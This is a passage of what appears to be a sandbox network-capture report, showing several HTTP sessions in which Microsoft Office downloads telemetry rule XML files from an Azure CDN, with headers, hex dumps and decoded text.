                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              88192.168.2.46380913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1358
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                              x-ms-request-id: 134b8558-a01e-0098-752e-2c8556000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061611Z-r159446fcd76z8lfhC1DFWug2s0000000130000000003ebb
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              89192.168.2.46380813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1395
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                              x-ms-request-id: ecad0b54-201e-003c-592a-2c30f9000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061611Z-176bd8f9bc5bc7vmhC1DFWbxbs0000000250000000002ggr
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              90192.168.2.46381013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                              x-ms-request-id: 8f98044c-301e-006e-14bd-2cf018000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061611Z-16ccfc49897rxv9khC1DFWwn2800000001v00000000001zq
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              91192.168.2.46381113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:11 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1352
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                              x-ms-request-id: c6b31955-701e-0050-5210-2c6767000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061611Z-176bd8f9bc5zzwfdhC1DFWqpb400000001pg000000008u4h
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              92192.168.2.46381213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1405
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                              x-ms-request-id: 78d67a8a-601e-003e-5516-2b3248000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061612Z-16ccfc49897nrfsvhC1DFW8e0000000001v0000000004vgu
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              93192.168.2.46381413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                              x-ms-request-id: 6c1a7512-101e-00a2-6d08-2c9f2e000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061612Z-16ccfc498974hjqwhC1DFW7uyn00000001ng000000004w0f
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              94192.168.2.46381513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                              x-ms-request-id: 39dcf0eb-f01e-0085-6308-2c88ea000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061612Z-16ccfc49897bsnckhC1DFW699w00000001mg00000000mmtb
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              95192.168.2.46381613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                              x-ms-request-id: a8c950df-601e-003d-4012-2c6f25000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061612Z-176bd8f9bc56k8bfhC1DFWtzvn00000001sg000000008mwq
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              96192.168.2.46381713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:12 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:13 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:12 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                              x-ms-request-id: b98585e4-601e-0001-4608-2cfaeb000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061612Z-16ccfc498979lfwnhC1DFW56w800000001r000000000emmc
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
